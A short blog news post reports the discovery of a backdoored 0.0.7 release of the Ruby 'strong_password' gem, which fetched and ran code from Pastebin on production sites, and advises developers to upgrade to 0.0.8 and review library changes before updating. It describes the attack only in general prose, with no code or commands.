Ruby on Rails
A Ruby developer has found a backdoor in a library used by Ruby on Rails (RoR) web apps. The dangerous backdoor was found in a default library called ‘strong_password’, version 0.0.7.
Many developers could have been using the infected version of the library and are urged to upgrade to the latest version immediately.
The backdoor was identified by a developer named Tute Costa whilst he was updating some libraries used in his workplace. He found a bogus version of the new Ruby ‘strong_password’ library, which carried a backdoor that could enable an attacker to execute code remotely. The flaw could be used to inject middleware to the code when deployed on certain production systems.
He looked at the ‘strong_password’ gem on RubyGem.org but couldn’t locate a changelog from the previous version, which was updated in October 2018. He found that the mystery 0.0.7 version included an embedded download link which ran code stored in pastebin.com, only if it was running in production.
The backdoor could be used to download code from the Pastebin address for production sites and would give attackers the power of remote code execution. Therefore, sites that had updated to the rogue version of the ‘strong_password’ gem could be silently hijacked.
The versions had been published by an empty account under a different name to the official maintainer of the library. The infected library has now been pulled and replaced with 0.0.8.
The hidden backdoor in the Ruby library seems to have been an orchestrated attack, as it had been inserted where it might not be noticed by users straight away. Thankfully Ruby has a wide community of developers that test and review updates to libraries on a regular basis.
This instance is another solid reminder that developers and systems administrators should look at file changes and which new features have been introduced before implementing any updates to internal systems.
Did you have the 0.0.7 version installed? Let us know in the comments or Tweet us @Hyve!